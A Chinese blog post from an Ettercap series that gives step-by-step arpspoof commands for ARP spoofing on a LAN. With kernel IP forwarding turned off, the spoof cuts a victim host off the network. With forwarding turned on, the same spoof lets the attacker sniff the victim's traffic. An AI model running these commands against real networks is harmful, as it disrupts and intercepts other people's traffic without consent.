Ettercap系列番外篇:Arpspoof断网攻击

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/lixiangminghate/article/details/86691609

    写了这么多Ettercap,插一个小插曲,简单提一下arpspoof。arpspoof也是ARP嗅探工具,用于断网攻击就像是提炼石油时获得沥青一样,并非主要用途。arpspoof需要用到linux内核转发功能。内核转发一般用在2种场景:

1.主机上2块网卡,一块接内网,一块接外网;将内网的数据转发到外网,使得主机具有网关的作用。

2.端口转发(配合iptables)。

现在开始主题:

1.断网攻击:

1.1.关闭linux内核转发:

echo "0" > /proc/sys/net/ipv4/ip_forward

1.2.运行arpspoof

受害者主机IP:192.168.75.129 局域网路由:192.168.75.2

arpspoof -i eth0 -t 192.168.75.129 -r 192.168.75.2
#arpspoof命令形式:
#arpspoof -i interface -t target-ip -r host-ip
#-i 指定用于ARP欺骗的网卡
#-t target-ip 指定被ARP欺骗的目标主机ip
#-r 用于双向欺骗
#host-ip 一般是局域网中路由器。按我理解,host-ip是局域网中于target-ip通信的另一台主机。用于指定进行ARP欺骗的通信双方

由于关闭了内核转发功能,arpspoof收到目标机的数据包后,不再转发到路由器,因此实现了断网的功能。

2.网络嗅探:

重新开启内核转发功能,arpspoof收到目标机器的数据包后,有机会转发给路由器

echo "1" > /proc/sys/net/ipv4/ip_forward

 剩下的命令和断网攻击一样,不在赘述。

猜你喜欢

转载自blog.csdn.net/lixiangminghate/article/details/86691609